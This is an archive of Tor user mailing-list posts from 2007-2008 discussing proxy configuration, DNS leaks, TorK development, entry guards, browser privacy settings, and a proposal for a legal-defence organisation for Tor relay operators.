On Sunday 20 January 2008 00:38:35 Michael Schmidt wrote: Hi please have a look at the http://offsystem.sf.net If you want to distribute a file anonymously, upload it into the Offsystem and send the OFF-Link over Tor. That allows Tor to do anonymous Filesharing without any Bandwidth for the system. Offsystem is a kind of uncensorable Online Storage Hard Disk. Mike There don't appear to be any source tarballs and looking at the cvs repository only the project members could possibly know how to put the many modules together. There don't appear to be any revision tags either. And there's no build documentation in plain sight. That is seriously shoddy for an open source project. I'm sure offsystem is almost all that it says it is but the lack of all of the above make it as near a black box as your average closed source application. Annoying. signature.asc Description: This is a digitally signed message part.
Re: Konqueror SOCKS with Tor+Privoxy
On Saturday 19 January 2008 23:36:35 Roger Dingledine wrote: On Sat, Jan 19, 2008 at 03:31:51PM -0800, Ned Bun wrote: I can't find an answer to this question anywhere. You might find https://www.torproject.org/docs/tor-doc-web to be useful. In using Konqueror with Tor and Privoxy, should the SOCKS settings in Konqueror's Settings-Configure Konqueror-Proxy-SOCKS be configured in some way? It seems to work fine without the SOCKS section configured, but leaving the Enable SOCKS support box unchecked disturbs me slightly. Should this section need configuration if everything appears to be working? Why are instructions for Firefox for SOCKS always specified but when it comes to Konqueror, no one says anything about the SOCKS configuration area? You should configure the socks part too. The reason is that browsers have a habit of supporting all sorts of weird protocols besides http and https, and if some webpage gives you (over Tor) a link that points to one of those other protocols, then your browser will fetch it without going through any proxies. If you specify a socks proxy, your browser should [*] use the socks proxy for all other protocols. (I say should because I have no idea what bugs konqueror has where it decides it's smarter than you and shouldn't use a proxy for some situation.) For some reason Konqueror doesn't support socksifying to a tcp port - only the library detection and loading that Ned describes. It's hardcoded to detect any of the following files in the usual paths (or a path you specify): _libNames libsocks.so // Dante libdsocksd.so.0 // Dante 1.1.14-2 on // Debian unstable 17-12-2003 libsocks5.so // ? libsocks5_sh.so; // NEC Many of Konqueror's IO slaves (e.g. smb:/, fish:/ for obvious reasons) don't respect its proxy settings so if the user assumes that the window, rather than the protocol, is anonymized then that will be a problem. However, installing Dante is also a problem because then *every* ioslave starts using it, including pop3, smtp and so on. So a rock and a hard place. TorK, which supports using Konqueror, needs to alert the user that Konqueror can only be safely used for http and https. As other posters have noted, Konqueror is quite secure in some respects, but it's pretty crap socks support and the integration of ioslaves into the interface are a problem. signature.asc Description: This is a digitally signed message part.
Re: filesharing with tor and offsystem online storage
On Sunday 20 January 2008 18:19:30 Michael Schmidt wrote: Hi Robert, source is here: http://offsystem.cvs.sourceforge.net/offsystem/?sortdir=down On Jan 20, 2008 7:05 PM, Robert Hogan [EMAIL PROTECTED] wrote: There don't appear to be any source tarballs and looking at the cvs repository only the project members could possibly know how to put the many modules together. Yes, that's the cvs repository I was referring to above - there are no tags there and no source tarballs anywhere else. This means that there is no source distribution for any of their releases. That's annoying. I'm guessing that off_network is the main module there but why should I bother reverse-engineering their build process just to install a possibly broken cvs version? I want the latest release. It's their funeral at the end of the day but an open-source project that doesn't release source tarballs is just being silly. signature.asc Description: This is a digitally signed message part.
Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?
On Friday 11 January 2008 05:15:13 Scott Bennett wrote: I'm assuming the patch is to get tsocks to do name resolution via a socks proxy using 4a or 5. If that is correct, where can I get the patch, please? I'm running FreeBSD 6.3-PRERELEASE, but haven't updated my ports tree in months (since before the X.org 6.9 -- 7.2 ports freeze), so I'll need to patch it directly. http://www.totalinfosecurity.com/patches/tor.php Hope this helps. signature.asc Description: This is a digitally signed message part.
Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?
On Friday 11 January 2008 22:02:52 Robert Hogan wrote: On Friday 11 January 2008 05:15:13 Scott Bennett wrote: I'm assuming the patch is to get tsocks to do name resolution via a socks proxy using 4a or 5. If that is correct, where can I get the patch, please? I'm running FreeBSD 6.3-PRERELEASE, but haven't updated my ports tree in months (since before the X.org 6.9 -- 7.2 ports freeze), so I'll need to patch it directly. http://www.totalinfosecurity.com/patches/tor.php Hope this helps. Oh dear. That link seems to be dead now. Though it does redirect to a picture of pretty young things pointing at pie-charts on a laptop... mmm, secuuure. http://wiki.noreply.org/noreply/TheOnionRouter/TSocksPatches seems to be the place to look for the patch sources these days. signature.asc Description: This is a digitally signed message part.
Re: Pidgin and Gajim are both DNS-leaking, what IM-tool for Jabber are you using?
On Thursday 10 January 2008 17:39:54 kazaam wrote: Hi, I tested today Pidgin and Gajim for DNS-leaking and found that both are doing it. In Both you can't circumvent it. Even when using a http-proxy they still resolve the dns by themselves not using the proxy. What is your preferred IM-application for jabber? greets For the likes of Pidgin and Gaim you're better off using the patched version of tsocks. If you're a Linux user, TorK offers a one-click way to launch pidgin or gaim socksified by the non-dns-leaking tsocks through tor. To get this work all you have to do is install TorK. It also has a 'failsafe' option that (with the tor 0.2.x series) will route all your systems dns traffic through Tor. Disclaimer: I'm the developer of TorK. (http://tork.sf.net) signature.asc Description: This is a digitally signed message part.
Re: Missing key from authority?
On Wednesday 09 January 2008 21:22:54 Tom Hek wrote: Hello, This message started flooding my logs: Jan 09 22:19:27.260 [notice] We're missing a certificate from authority tor26 with signing key : launching request. A friend of my has exact the same message flooding over his log. We are both running 0.2.0.15-alpha. OS on my box is FreeBSD and on his box Debian, so I think this message is not OS related but it's related to the authority. Is someone else having the same message lately? Tom This seems to be fixed in the latest svn revision. You can try it out by doing: mkdir ~/torsvn cd~/ torsvn svn checkout https://tor-svn.freehaven.net/svn/tor/trunk tor ,/.autogen.sh signature.asc Description: This is a digitally signed message part.
Re: netstat reporting destinion IP address
On Sunday 25 November 2007 02:23:18 anonym wrote: On 25/11/07 02:54, Gregory Maxwell wrote: On 11/24/07, anonym [EMAIL PROTECTED] wrote: Even though we still get as much anonymity as Tor offers and netstat is wrong in some way I really do not want this to happen. Incognito uses TorK as a control GUI to Tor, and since its Non-Tor traffic log uses netstat and thus will log these erroneous connections, users might freak out and think that Incognito is unsafe. In fact, that was what happened to me. Can this be fixed? Yes. Don't do that. it would be better if you were running something that sniffed the network and showed the user all outbound packets that were not TOR. Absolutely.The use of netstat for the gui (at the moment) is intended to alert the user to chronic non-anonmous traffic and is flagged in the gui as 'Not 100% reliable'. The use-case is: OK I'm visiting this site anonymously but is it generating stateful traffic I'm not necessarily expecting? That log window has been there since the year dot and can definitely be improved on. The simplest approach I can think of is a setuid libpcap-based program to replace the use of netstat. The word 'setuid' rings alarm-bells though and I would certainly welcome advice on how much harm such a thing could cause. (Installing an rc.d launched daemon is very hard to do in a (linux) platform agnostic way, so if someone is suggesting such an approach I would appreciated input on how to implement it properly). Would libpcap capture stateless/connectionless traffic though? That would be better but my concern is mainly with TorK, and it uses netstat for its logs. I don't expect the average Incognito user to monitor netstat, but they might very well find some misleading information in Tork's logs (as they are very easily accessible through a nice GUI and all). Well, I guess this is an issue with TorK. Hopefully Robert Hogan (TorK's maintainer) will read this, although my problem might be a bit too specific to justify a fix which I guess would turn out much more complex than the current solution with netstat. The 'real' solution is definitely still to be found. The information from netstat is misleading because it is using the /proc filesystem to gather that's, and that's at least one level up from the packet-munging taking place in netfilter (according to my simplistic understanding). It will always be misleading. Maybe even the info from libpcap would be misleading. Could you try out pktstat (which I learned of on #tor and uses libpcap) and see if the correct info gets reported? Another candidate is ip_conntrack, but again a root-owned daemon would be required. Anyone with wisdom to spare on this listening? Just looking at netstat may well miss short-lived (and especially connectionless) packets which are probably much more of a significant real threat to the user. Agreed. TorK tries to guard against these for the non-incognito user by providing two 'fail safe' options (DNS Failsafe, and 'System Failsafe') which route DNS and sensitive, ecnrypted traffic respectively through Tor. The traffic that's routed is configurable for both options. If I'm not mistaking, Tor circuits are long-lived enough to show up (?). The connection to the Tor server at the start of the circuit shows up there alright, and yes they are long-lived enough generally. Or are you suggesting that Tor initiates other connections as some sort of intermediate step (I'm certainly no expert on the inner workings of Tor)? Perhaps I wansn't clear enough, but the only Internet traffic that is allowed is made through Tor. Any way, I don't know exactly how TorK uses netstat to generate its log (I guess it uses --continuous which updates every second), but the entries in the log stay even though the connection has been disconnected (and netstat stops showing them). Yes, it's intended as a record of your session, but is not retained between sessions and can be cleared at any time. Connectionless packets is not a problem as only TCP is allowed to leave the computer since UDP etc., as you pointed out, might be a real threat. signature.asc Description: This is a digitally signed message part.
Re: server incorrectly believes IP address has changed
On Tuesday 20 November 2007 21:34:16 you wrote: cached-routers and cached-routers.new are not the file names used in 0.2.0.12-alpha, but rather cached-descriptors and cached-descriptors.new, and in my original message, I wrote: - I restarted my tor server a couple of hours ago, and since then, it has -been acting very peculiarly. Here are the notice-level log file entries since -startup. Note that I deleted cached-descriptors and cached-descriptors.new -after shutting down tor and before shutting down the system several hours prior -to this startup. Ah, missed that. It looks like cached-routers is still a fallback though, so if it is still there it will get read. In fact, if cached-routers *was* still present that would explain why the address was noticeably out of date. occasion my own *guess* would be that tor is using the old IP stored there,= =20 especially since 66.225.42.30 was your address at one point: =20 http://www.google.com/search?hl=3Denq=3Dmycroftsotherchild+66.225.42.30b t= nG=3DSearch Whoops, Yes, the ISP has a limited list of IP addresses that it assigns, so the same addresses do recur frequently. In this case, I noted, -Nov 20 06:29:37.282 [notice] Now checking whether ORPort 66.225.36.5:995 and DirPort 66.225.36.5:443 are reachable... (this may take up to 20 minutes -- look for log messages indicating success) - - Note that the above address was incorrect. The correct address was, and -still is, 66.225.42.30. It has not changed since before the system was -rebooted. Whether it 's a good thing for Tor to just try the last known good address= =20 rather than figure it out all over again on the off-chance it may be out o= f=20 date, I don't know. I thought the point of specifying a host+domain name in the Address line was to get tor to *look it up in the name server net*. The tone of your comments below is unfair to Csaba. He was merely offering = a=20 friendly (and free) suggestion. No one would ever respond to anyone else on= =20 this list if that sort of thing was the default response. In that case, I apologize. I took offense at the comments that appeared to ignore what I had written, while taking a very condescending tone and assuming I hadn't done the obvious checking before posting. Thanks for taking the point! signature.asc Description: This is a digitally signed message part.
Re: new perspektive for tor
On Friday 16 November 2007 17:04:18 Michael Schmidt wrote: Due to data retention logg needs/law in the EU, there will be no outproxy and no forwarding-nodes in the EU anymore, if they do not logg all traffic. Can someone point me to the EU directive on this? I thought this was just a German initiative. signature.asc Description: This is a digitally signed message part.
Re: new perspektive for tor
On Saturday 17 November 2007 14:42:56 you wrote: Hi Robert, On Sat, 17.11.2007, you wrote: Can someone point me to the EU directive on this? I thought this was just a German initiative. http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=OJ:L:2006:105:0054:01 :EN:HTML felix If you go to the bottom of that link you can see many countries appear to be 'postponing' application of the directive indefinitely. signature.asc Description: This is a digitally signed message part.
Why Are We Waiting for the Cavalry to Ride In? (was Re: court trial against me - the outcome)
On Wednesday 14 November 2007 14:22:29 Mirko Thiesen wrote: I asked What about a postal service that delivers i.e. a bomb or a blackmail letter? Do they help people committing crimes as well? They said that these two things could not be compared as a postal service offers transportation services whereas I offer anonymization services. First of all, well done and keep up the good work. Secondly, your case is proof, if proof were needed, that Tor is still a project without a rock-solid layman's analogy. Every Tor server operator that ends up explaining Tor to a non-technical or even just plain skeptical audience will encounter the same problem until the crack of doom unless we all put our heads together and document one. Here is my stab to get things rolling: Why should Internet usage be anonymous? Because almost everything else in our life (e.g. TV, radio, the postal system, telephony, cash) has a great deal of anonymity built in. Imagine being asked to sign your name at the newsagents every time you buy a newspaper or being asked to fill out and sign a form detailing every radio program you listen to? What would your response be? Well, newspaper websites and internet radio broadcasters take your signature every time you use them. The information that establishes what you have listened to and what you have read on the internet is logged and stored centrally. So unlike the real world, the internet has no privacy built in. You are made to sign for everything. So unless you are proposing that we should sign a docket every time we read a newspaper article, unless you believe that paper money should be abolished because it allows people to purchase goods without creating a permanent record then you must believe that the same right to privacy we enjoy in a world with cash, radio, and television pertains in a world with cash, radio, television plus the internet. Thirdly, Tor operators of the world need to unite. The Tor project is not our daddy. There is no Tor Project cavalry over the hill about to ride in with a coachload of free lawyers. We need to establish a fighting fund for exactly these sorts of cases. This fund needs to be managed by a compaign group in such a way that it doesn't undermine the anonymity of the network we all help provide. I believe informal ad-hoc donations won't cut it. There needs to be an organized body that can accumulate wisdom, develop public credibility and even distribute funds to cover basic legal costs or more. This could be organized along the following lines: * The organization would be on a subscription basis. X euro/dollars a year. * The organization would accept donations of all sorts. * The organization would be registered as a campaign group/NGO (or whatever is appropriate) in as many countries as possible. This will require a country representative in as many countries as possible. * Every subscribed member will be entitled to whatever the organization can afford within some reasonable minimum/maximum of protection. * Maybe the organization could negotiate and take out some sort of legal insurance on behalf of it's members? What sort of insurance would be appropriate? Is there such a thing? I don't think any of the above is pie-in-the-sky. Tor server operators aren't anonymous. They already communicate/collaborate with each other regularly on IRC and this mailing list. When a tor operator is 'hassled by the feds' they deserve a lot more than tea and sympathy on or-talk. They deserve the resources of an organized association that has funds, expertise and a bit of a clout to ride in and back them up. Maybe we can wait for George Soros to read about Tor for that to happen, or maybe we can get organized and start defending something we clearly all believe in. There are all-sorts operating tor servers on this list. Who can tell us what concrete steps we need to take to set up a Tor Operator NGO? What's the best way of incorporating/associating ourselves? What sort of insurance could such an organization arrange? How could we do all this without turning the network into some kind of cadre? Yours from the moral high ground, ;) Robert signature.asc Description: This is a digitally signed message part.
Re: court trial against me -
On Wednesday 14 November 2007 20:22:09 TOR Admin (gpfTOR1) wrote: Hi Mirko, 1: by German law a Tor node admin is something like an access provider. You are not responsible for your traffic. If the court have only an IP address and you have a tor status log, they have nothing. 2: Tor is a legal service in Germany (today and yesterday, tomorrow we will see). If you provided only a legal service, it is no way to construct a case of aiding and abetting and you are not a disquieter or something like that. 3: May be, there is a judge, who do not these facts. The law depends not only on one judge. Dont give up. 4: You need help. Try to contact the following organizations: - AK Vorratsdatenspeicherung (data retention free contact form ;-) at http://www.vorratsdatenspeicherung.de/content/view/70/82/lang,de/ ) - German Privacy Foundation e.V i.Gr. (data rentention free contact form at http://www.privacyfoundation.de/index.php?id=36 ) - Humanistische Union e.V. (They have lawyers by training and they are interested in TOR.) - Chaos Computer Club, - Heise Verlag, try to contact the journalist H. Bleich By the way (for other admins), it is not a good solution, to ignore the first letter. Go to the visit and explain, what you have done and what you have not done. This is all excellent advice, and it is characteristic of the level of solidarity and helpfulness regularly displayed by Tor operators on this list. But it underlines the fact that a Tor operator in need is always: 1. In need of concrete, immediate help. Guaranteed. 2. Completely on their own. The second point can't be emphasized enough. Nothing we say on this list can help with the legal bills or demonstrate physical solidarity in court. Mirko is a tor server operator. There are hundreds of us. But that judge and prosecutor looked around the court and thought to themselves, 'If this Tor is so legit, where's your backup Mirko?' The fact that Mirko waited until the case was done and dusted before reporting in shows us all the problem we have. We *expect* to be cut loose. We are a single-issue, special interest group. Mirko shouldn't have to go begging to a bunch of tangentially-interested organizations looking for a sympathetic ear. He should be able to come to us and we, as a group, should be able to cover some of his legal costs and access to a specialist lawyer. We should have had representation in that court blasting the prosecutor back to conveyancing cases. Simple as that. Unless we can do that as a body, we are all fucked as individuals. Period. If you want to know my suggestion for remedying this situation: http://archives.seul.org/or/talk/Nov-2007/msg00144.html I would give time and money to such an organization. So let's get some sound advice from each other and set one up. signature.asc Description: This is a digitally signed message part.
Re: court trial against me - the outcome
On Wednesday 14 November 2007 20:47:50 you wrote: This country needs an revolution! Maybe! ;) In the meantime, solidarity among Tor operators would go a long way. If that case had been for 100,000 euro you might now find yourself with a date in court. Who would you turn to in such a situation? We need to create a body that we can all turn to, and only we as a group can create it. Would you be willing to contribute time to creating such an organization? Do you have any contacts who could advise on how to establish it? If so, let me know. And apologies in advance for contacting you directly if it is unwelcome. signature.asc Description: This is a digitally signed message part.
Re: first hop to entry node, encrypted? sorry for trivial question
On Tuesday 06 November 2007 16:47:15 Jefferson Iblis wrote: On Nov 6, 2007 8:55 AM, Florian Reitmeir [EMAIL PROTECTED] wrote: Hi, On Tue, 06 Nov 2007, Jefferson Iblis wrote: I've heard variously that Tor does encrypt my communications with my entry node, and also that it does not. Which is true? Communication between: Your Host - Tor Entry Node is encrypted Thanks. Then I'm a little perplexed about why it's preferable to use a limited number of entry guards to avoid traffic analysis. Because it reduces the chances of you happening upon someone who owns both the entry and the exit node on your circuit. If someone owns both they can perform a bit of timing analysis and figure out who you are and where you're going. See this thread http://archives.seul.org/or/talk/Dec-2006/msg2.html particularly this mail http://archives.seul.org/or/talk/Dec-2006/msg7.html for what can happen if the same guy owns all three nodes. If the connection between me and the entry guard is encrypted, and all I'm telling the entry guard is please pass this encrypted stream to next specified tor server, what is the danger? Can the entry guard see my traffic, or do they just see another layer of encryption? Just another layer of encryption. They can't 'read your traffic'. signature.asc Description: This is a digitally signed message part.
Re: Insecure Privoxy Configuration in Vidalia Bundles Prior to 0.1.2.18
On Wednesday 31 October 2007 15:34:18 Gregory Fleischer (Lists) wrote:
Versions of the Vidalia bundle prior to 0.1.2.18 install Privoxy with
an insecure configuration file. Both Windows and Mac OS X versions
are affected. The installed 'config.txt' file ('config' on Mac OS X)
had the following option values set to 1:
- enable-remote-toggle
- enable-edit-actions
snip
In order to allow time for people to upgrade, additional attack
details and sample code will be withheld for a couple of days.
TorK is affected by this too. There should be a 0.22 available before Friday.
signature.asc
Description: This is a digitally signed message part.
Re: Setting up a private tor network
I was also setting up my own Tor network based on the instructions in the FAQ, but I've been trying to reproduce it as a virtual network running a number of User Mode Linux based virtual machines on one PC. It is available as a Netkit laboratory; I think it is quite easy to install and run, so if you want to experiment, let me know and I send it to you. I think everyone on the list would be interested. Can you send a link? If it's not *too* big I can mirror it. signature.asc Description: This is a digitally signed message part.
Re: Library Defeats Tor Followup Addl Info
On Monday 15 October 2007 23:58:37 [EMAIL PROTECTED] wrote: shnip well then explain to me how they can monitor dns traffic if all dns requests are made within the originating client box and not to any outside source. maybe all you tor gurus can explain how clients usually make dns requests through tor and WHY IT IS THAT TOR ALLOWS COMPUTERS TO LEAK DNS REQUESTS AT ALL TOR SOFTWARE SHOULD NOT ALLOW THIS AND SHOULD FAIL TO WORK IF DNS REQUESTS ARE MADE TO ANY NODE OTHER THAN TOR THROUGH PRIVOXY. OH THAT'S RIGHT TOR IS EXPERIMENTAL AND NOT FOR GENERAL USE. FUNNY HOW LONG IT HAS BEEN EXPERIMENTAL. MAYBE THE FAULT HERE IS WITH TOR, NOT WITH ME OR THE LIBRARY? shnip Whether a dns request gets routed through privoxy (or any other privacy proxy you use) and then tor depends on the system call the application uses to perform the request. The problem is that some applications perform system calls that by-pass their own proxy settings. This is more by happenstance than design. It's important for Tor users to know how to guard against this and even prevent it and the tor devs have put a lot of work into making it easier for tor's helper applications to do so. It sounds like in your situation some windows equivalent of a kernel module is hooking system calls like dns requests and doing something funky with them, the result being that DNS requests that would get routed to Tor on a normal installation are being forwarded to a big display board in the staff common room or whatever. Tor can't manage and inspect your system the way you would like it to. Other apps have to help it do this. For browsing purposes, on an OS that you can't control and don't own, the only real solution may be something like janusvm or a livecd like incognito. Hope this helps, and apologies if I'm repeating stuff elsewhere in the thread or have misunderstood your query. signature.asc Description: This is a digitally signed message part.
Re: Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Sunday 14 October 2007 19:50:38 [EMAIL PROTECTED] wrote: On Sat, Oct 13, 2007 at 09:21:40AM +0100, [EMAIL PROTECTED] wrote 0.9K bytes in 30 lines about: : Do: : Spoof user-agent (is this necessary even with javascript disabled?) : (browser) Arguably, unless you're using BobnJoe's browser, any of the popular ones should provide sufficient numbers (firefox, safari, opera, ie). konqueror, a bobnjoe browser if ever there was one, can only turn off sending the user-agent and spoof it for selected websites. it doesn't even support regexes. : Spoof http-headers as though a US english browser (browser/privacy : proxy?) Only if you want to appear as coming from the US, and if you read English. If you're in UAE and spoofing US English, then you may stand out for being different. But no-one should know you're in the UAE because you're using tor. Or have I missed your point? : Do not: : Use tabs (enforced/recommended by controller?) Why? : Keep the browser open when finished 'using tor' (enforced/recommended by : controller?) If your browser properly cleans up and you've disabled everything, chances are this isn't that big of a deal. for both, javascript timers apparently. a separate browser or open-and-close browser session seems to be the thing. signature.asc Description: This is a digitally signed message part.
Re: magic Wednesday
On Saturday 13 October 2007 23:56:57 Roger Dingledine wrote: On Thu, Jul 12, 2007 at 08:22:45PM +0200, Olaf Selke wrote: shnip So what's happening is that on the first morning at 6am, your Tor server is getting a hup signal, which causes it to publish a new descriptor and reset its 18 hour counter -- meaning it won't publish again until 6+18=midnight. So now it's in a cycle where it tries to publish twice a day: once at midnight, and once at 6am. Just to clarify for anyone else scratching their heads: it's publishing at 6am every day because the server has a cron job that hups the server every day at that time. The hup wasn't a one off but a daily thing, which is standard in the tor debian package. signature.asc Description: This is a digitally signed message part.
Browser dos/don'ts ( was Re: Incognito Live CD using Polipo)
On Friday 12 October 2007 00:26:46 [EMAIL PROTECTED] wrote: On Thu, Oct 11, 2007 at 08:57:48PM +0100, [EMAIL PROTECTED] wrote 1.1K bytes in 29 lines about: : Keeping track of all the things you should turn off or get a proxy to : tweak makes my feeble head hurt. The latest torbutton-dev releases handle most of this for you. So for any browser without torbutton the list of things to do while using tor is: Turn off: Javascript (browser) Java (browser) Plugins (browser) Cookies (browser) Referer Headers (privacy proxy) Caching (browser) History reads/writes (browser) Do: Spoof user-agent (is this necessary even with javascript disabled?) (browser) Spoof http-headers as though a US english browser (browser/privacy proxy?) Do not: Use tabs (enforced/recommended by controller?) Keep the browser open when finished 'using tor' (enforced/recommended by controller?) Anything to add/remove/clarify?
Tor Defcon Talks
The defcon videos are up. This is Roger's: http://video.google.com/videoplay?docid=-9081582671026610093q=defcon+roysac.com+dingledinetotal=1start=0num=10so=0type=searchplindex=0 You can view Nick's and Mike's by changing dingledine to mathewson and perry respectively in the search box. Are there any other tor-related ones? signature.asc Description: This is a digitally signed message part.
Re: funneling a wireless net's outbound connections through tor
On Monday 01 October 2007 16:35:29 Mike Cardwell wrote: If you use Tor, you considerably increase the number and range of people that could potentially attack you. You also make yourself a tastier target. This is not a bad thing if you know how to deal with it. It *is* a bad thing if you don't. For example, I have only ever had attempted MITM attacks against my ssh sessions when using them over Tor. I think torifying a user's traffic without informing him of it is a very bad idea. Pop3 is the best example. I don't think anyone with all the facts to hand would ever use a pop3 session over Tor. Whatever the merits of the well-you-go-over-x-hops-anyway argument (and it generally does not apply to pop3), tor is always x-hops + 1, and that '+ 1' could be anyone from Aunt Nellie to the NSA, no special privileges required. This is one of the main challenges faced by Live CDs and other Torified environments - is it better to anonymize everything in the session or always prevent the likes of pop3 from being anonymized, ever? signature.asc Description: This is a digitally signed message part.
Re: Set up a webproxy to TOR - tor-proxy.net
On Monday 24 September 2007 02:22:34 Ricky Fitz wrote: Am Sonntag, den 23.09.2007, 20:50 -0400 schrieb [EMAIL PROTECTED]: On Mon, Sep 24, 2007 at 12:42:31AM +0200, Ricky Fitz wrote: It is running on the same server my TOR-Server is running (called GrossATuin). Does your proxy use a separate Tor client, do you exclude your node as as an entry? No, it does not use a seperate Tor-Client. Therefore it doesn't make sense to exklude my node. It uses the Tor-Session which runs as a tor-node. So if you spy on the traffic of the server, you will not be able to see, which traffic is from routing traffic for acting as a server, and which from acting as a client. I think that's safer than using a second client. So is your cgi-proxy routing everything to an instance of privoxy/polipo running on your machine or directly to the tor socks port? If it is routing everything to privoxy/polipo, what configuration are you using? I think it is this sort of detail that phobos has in mind. I was wondering recently about the security implications of such a setup. I was thinking of using a vpn to access my Tor server. From there, all vpn traffic would be proxied through another tor instance running in client mode with no bw limitations. Would that be more secure because a tor server is already running there or less secure because, if in some way, the traffic from the two instances could be differenciated and the vpn connections would make the whole system less secure because they would allow timing and statistical attacks relating vpn traffic to the second tor traffic? I really don't know, if it will be possible to identify the vpn-connection because of the data which is transferred. But it would be possible, to see that there is another service running than tor. Also, what Bluestar is doubled. If we build a VPN from my server to yours, not only me is theoretical able to spy on the traffic, but also you. (Not that I want to say I do not trust you, but it kills the advantages of onion-system. I think the answer is 'less secure'. That vpn link to bluestar88 is used only by you and it contains all your anonymous traffic on one little pipe over the internet. Unless the link is padded to camouflage inactivity that has to make things easier for an observer. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: Load Balancing
On Friday 21 September 2007 19:34:09 Alexander W. Janssen wrote: On 9/21/07, Arrakis [EMAIL PROTECTED] wrote: Hey guys, quick question. If I have Tor process running, and request a url that has 10 images to load from the same domain, do all the requests go through the same circuit, or does the tor process split up the requests across all the circuits? Interesting question. From what I understood a new circuit is created for every TCP-connection. If your browser grabs, for instance, 6 images at the same time (6 loading instances == connections), Tor should open 6 different circuits. However, considering your question... It doesn't sound too efficient to me... The slides say If the user wants to access a different site, Alice's Tor client selects a different path. I'm curious how strict I should read that... Site vs. TCP-connections? Alex. The original question is answered later in the thread, but there is an interesting distinction between polipo and privoxy in the way this situation is handled: - privoxy will use new streams on the same circuit for each of the images - polipo will generally pipeline everything over the same stream I believe this results in a perceptible performance improvement for general browsing. Someone please correct me if I've got this wrong, because I'm just working from observation. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: Exclude nodes from certain countries
On Friday 14 September 2007 18:27:21 misc wrote: I'm using Tor on windows I prefer to avoid tor nodes from certain countries. I know that I can manually add nodes into ExcludeNodes setting in Tor Config. However there are over hundred different Tor nodes in one country I want to exclude. And they're constantly changing (news ones pop up, old ones disappear, etc). It's impossible to do such a task manually using ExcludeNodes setting. Didn't anybody find a better way? TorK allows you to do this (in a rough and ready way using the geoip database (maxmind.com) - about 9x% accurate). TorK is available only for Linux/BSD unfortunately, but you could you use the Incognito LiveCD which uses TorK as the default Tor interface. http://www.patdouble.com/index.php?option=com_contenttask=viewid=11Itemid=18 http://files1.cjb.net/incognito -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net signature.asc Description: This is a digitally signed message part.
Re: ATTN: An attack on my torrc? I did not specify a server or an exit node!!!
On Saturday 15 September 2007 20:20:32 jeffery statin wrote: This was in my message log today and I did not specify a server or an exit node (if that is what using exit refers to). Hell, I just re-installed this Windows XP SP2 and just installed the Tor bundle (Tor v.0.1.2.17, Vidalia v0.0.14). I haven't even opened the torrc or torrc.orig.1 before I noticed this warning! The warnings are nothing to worry about. Sep 15 10:03:58.640 [Notice] We tried for 15 seconds to connect to '[scrubbed]' using exit 'ZoneSecurite'. Retrying on a new circuit. Tor/Vidalia created this circuit automatically and chose the exit randomly. Sep 15 11:49:32.906 [Warning] You specified a server mono by name, but this name is not registered, so it could be used by any server, not just the one you meant. To make sure you get the same server in the future, refer to it by key, as $B468125D79F3C03491EB95FD8126981E5348D88C. Vidalia probably requested information from Tor for 'mono' by 'name' rather than 'fingerprint'. Again, this is not anything to worry about. Just the normal operation of your tor/vidalia bundle. signature.asc Description: This is a digitally signed message part.
Re: Proposal of a new hidden wiki
On Wednesday 08 August 2007 22:59:56 Ringo Kamens wrote: It's not the issue of a great wall attack where a person can't access a public wiki with onion links, it's an issue of whether that wiki could even exist. You'd have to crazy to host that on a public machine. Comrade Ringo Kamens You mean like these crazee boyz? http://eng.anarchopedia.org/Tor_network_links This is a useful link, could someone add it to the neat links section? signature.asc Description: This is a digitally signed message part.
Re: Proposal of a new hidden wiki
On Wednesday 08 August 2007 19:32:39 Ringo Kamens wrote: I'm interested in testing this out with somebody. Until then, can any devs/tor hackers enlighten us as to what would determine which host gets picked? Would it be whoever is the fewest hops away? If so, one host would get the most traffic if it was consistently closest to fast servers. Comrade Ringo Kamens The spec says: Upon receiving a descriptor, the directory server checks the signature, and discards the descriptor if the signature does not match the enclosed public key. Next, the directory server checks the timestamp. If the timestamp is more than 24 hours in the past or more than 1 hour in the future, or the directory server already has a newer descriptor with the same public key, the server discards the descriptor. Otherwise, the server discards any older descriptors with the same public key and version format, and associates the new descriptor with the public key. The directory server remembers this descriptor for at least 24 hours after its timestamp. At least every 18 hours, Bob's OP uploads a fresh descriptor. So if a number of servers shared the same hidden-service key they would just overwrite each other's descriptor with each upload. They would never co-exist, instead the most recent poster would get the traffic. It seems like it should work as long as the servers agreed to update at different times. Not sure how secure such a service would be though. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net signature.asc Description: This is a digitally signed message part.
Re: Directory servers for a subset of Tor routers
On Sunday 05 August 2007 20:13:14 Silviu Udrea wrote:
Can i configure TOR to use it with some code so i can choose which exit
node i want? Something like this:
TOR_exit_nodes[10];
for( i=0; i10; i++ )
{
retrieve_webpage( URL, TOR_exit_nodes[ i ] );
}
This code should rotate 10 TOR_exit_nodes to retrieve some webpages with
PHP or JavaScript.
You can view google using baobab as an exit with the following url:
http://www.google.com.baobab.exit
That means you can do something like:
TOR_exit_nodes[10];
for( i=0; i10; i++ )
{
retrieve_webpage( URL + . + TOR_exit_nodes[ i ] + .exit );
}
signature.asc
Description: This is a digitally signed message part.
Re: bandwidth graph ok with 0.1.2.14-dev only
